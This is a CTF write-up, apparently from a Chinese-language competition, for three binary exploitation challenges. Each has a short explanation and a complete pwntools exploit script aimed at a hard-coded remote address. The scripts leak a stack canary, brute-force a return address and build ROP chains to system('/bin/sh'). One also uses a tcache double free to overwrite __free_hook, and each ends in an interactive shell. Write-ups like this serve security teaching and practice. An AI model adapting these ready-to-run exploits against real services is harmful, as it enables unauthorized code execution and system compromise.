5月份36dctf

exec_comm.constprop+1162kaishell

PWN_MengxinStack

棧不會了orz
就是基本的棧溢出：操控 libc_start_main 這個函數來控制程序流程，需要將返回地址爆破到 libc_start_main+176，然後就是基本的 ROP 了。
exp:

#!/usr/bin/python2
from pwn import *
p=0  # module-level tube handle; 0 until pwn() assigns process()/remote() to it, reused by the retry loop's close()
def pwn(ip,port,debug):
	"""Run one attempt of the MengxinStack exploit and return True after interactive().

	debug == 1 runs the local './mengxinpwn'; any other value connects to ip:port.
	Both paths take libc from elf.libc, so every libc-relative value below is only
	valid when the binary's bundled libc matches the one the target actually runs.
	The first overflow rewrites only two bytes of the return address, which (per the
	write-up above) is a guess; a wrong guess surfaces as a tube exception that the
	caller is expected to catch and retry.
	"""
	global p
	if debug==1:
		p=process('./mengxinpwn')
	#p=remote('124.156.121.112',28012)
		elf=ELF('./mengxinpwn')
		libc=elf.libc
	else:
		p=remote(ip,port)
		elf=ELF('./mengxinpwn')
		libc=elf.libc
	# 0x29 bytes of filler: the program appears to echo the buffer back, so the bytes
	# following the filler (canary, then a stack pointer) come back in the reply.
	payload='a'*0x29
	p.sendafter('?',payload)
	p.recvuntil('a'*0x29)
	# The canary's lowest byte is always 0x00 (it was overwritten by the filler), so
	# it is re-added here and the remaining 7 bytes are taken from the echo.
	cannary=u64('\x00'+p.recv(7))
	# Take the next 6-byte value ending in 0x7f as a stack pointer; 304 is an
	# empirical offset to the frame used below -- TODO confirm against the binary.
	stack_addr=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')- 304
	log.success('cannary: '+hex(cannary))
	log.success('stack: '+hex(stack_addr))
	# Overflow #1: keep the canary, restore the saved frame pointer, then overwrite
	# only the two low bytes of the return address ('\xf0\xd7'). Page alignment fixes
	# the low 12 bits; the remaining nibble is the guess the write-up says is brute-forced.
	p.send('a'*0x28+p64(cannary)+'a'*0x10+p64(stack_addr)+'\xf0\xd7')
	# Overflow #2: a longer filler so the echo now reaches a libc pointer, assumed to
	# be __libc_start_main+240 (hence the subtraction) -- only true for that libc build.
	p.sendafter('?','a'*0x48)
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__libc_start_main']-240
	system=libcbase+libc.sym['system']
	bin_sh=libcbase+libc.search('/bin/sh').next()
	# Hard-coded gadget offset for the bundled libc; any other build needs a new value.
	pop_rdi=libcbase+0x0000000000021102
	# Overflow #3: canary intact again, then the three-entry ROP chain.
	p.send('a'*0x28+p64(cannary)+'a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(system))
	p.interactive()
	return True
if __name__=="__main__":
	# Retry loop: pwn() only returns True once interactive() ends; a wrong guess in
	# the partial return-address overwrite raises from the tube and the attempt is
	# repeated. Target host and port are hard-coded here (debug=0 => remote path).
	while 1:
		try:
			if pwn('124.156.121.112',28088,0)==True:
				break
		except Exception as e:
				# NOTE(review): p is still 0 when the exception happened before pwn()
				# assigned the tube (e.g. remote() failing), and int has no close(),
				# so this handler itself would raise and end the loop. 'e' is unused.
				p.close()
				continue

PWN_MagicString

這裏有個改變字符串的函數，將 ti 變成 sh 即可。
exp:

#!/usr/bin/python2
from pwn import *

def pwn():
	"""Send the MagicString stack overflow and hand the tube to the user.

	All addresses in the chain are hard-coded, so this only works against the
	exact './mackstring' build (non-PIE is assumed -- confirm). The write-up above
	only says a routine in the binary rewrites a string ("ti" -> "sh"); which of
	the constants is that routine and which is the string is not explained here.
	"""
	#p=process('./mackstring')
	p=remote('124.156.121.112',28012)
	elf=ELF('./mackstring')
	# 0x2a8 bytes reach the saved return address. Each triple looks like
	# gadget / argument / callee: 0x400733 is presumably a pop-rdi gadget (it is
	# written as 0x400733 here and as 0x400732+1 on the next line -- same value,
	# pick one spelling), 0x601048 looks like the string address (+5 is the
	# offset rewritten first), and system() is called through the PLT last.
	payload='a'*0x2a8+p64(0x400733)+p64(0x601048+5)+p64(0x40062D)
	payload+=p64(0x400732+1)+p64(0x601048)+p64(elf.plt['system'])
	p.sendlineafter('!',payload)
	p.interactive()

if __name__=="__main__":
	# Single attempt; nothing here is guessed, so no retry loop is needed.
	pwn()

PWN_babyheap

tcache 的 double free 不難，好像可以佈置好堆塊，將 tcache 寫壞然後就行了。

#!/usr/bin/python2
from pwn import *

def pwn():
	"""Drive the babyheap menu through a tcache double free and hand over the tube.

	Relies on three things that are only implied by the code: the remote libc is
	the one bundled as elf.libc; that libc still has __free_hook (it was removed
	in glibc 2.34, so this cannot work on newer builds); and the binary is non-PIE,
	since 0x602060 and elf.got['free'] are used as absolute addresses.
	"""
	#p=process('./babyheap')
	p=remote('124.156.121.112',28025)
	elf=ELF('./babyheap')
	libc=elf.libc

	# Menu wrappers: option '1' allocates and stores data, '2' frees by index,
	# '3' prints by index. The prompts are '>>' and ':' as seen in the traffic.
	def add(data):
		p.sendlineafter('>>','1')
		p.sendlineafter(':',data)

	def delete(idx):
		p.sendlineafter('>>','2')
		p.sendlineafter(':',str(idx))

	def show(idx):
		p.sendlineafter('>>','3')
		p.sendlineafter(':',str(idx))

	# Five chunks; index 2 holds '/bin/sh\x00' and is the one freed at the end.
	add('\x01')
	add('\x02'*0x10)
	add('/bin/sh\x00')
	add('doudou3')
	add('doudou4')
	# The double free the write-up refers to: the same index is released twice.
	delete(0)
	delete(0)
	# Reading the freed chunk returns its tcache link; only 4 bytes are consumed,
	# so the heap is assumed to live in the low 32 bits -- confirm. 0x260 is the
	# empirical distance from that pointer to the heap start.
	show(0)
	heap_base=u32(p.recv(4))-0x260
	log.success('heap_base: '+hex(heap_base))
	# The next allocations come back from the corrupted tcache list; the last two
	# point an entry at the binary's own data (0x602060) and then at free's GOT slot.
	add(p64(heap_base+0x50))
	add(p64(heap_base+0x50))
	add(p64(0x30)+p64(0x00602060))
	add(p64(elf.got['free']))
	# Printing index 0 now leaks free's libc address; derive libcbase from it.
	show(0)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
	system=libcbase+libc.sym['system']
	free_hook=libcbase+libc.sym['__free_hook']
	# Same trick again to make an allocation land on __free_hook and store system
	# there; freeing the '/bin/sh' chunk (index 2) then reaches the hook.
	add(p64(free_hook))
	add(p64(0)+p64(free_hook))
	add(p64(system))
	delete(2)
	p.interactive()

if __name__=="__main__":
	# Single attempt; every value is either leaked or taken from the binary.
	pwn()